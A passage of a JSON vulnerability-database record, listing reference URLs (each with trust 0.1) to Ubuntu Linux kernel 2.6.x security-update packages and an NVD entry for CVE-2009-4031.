        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4031"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
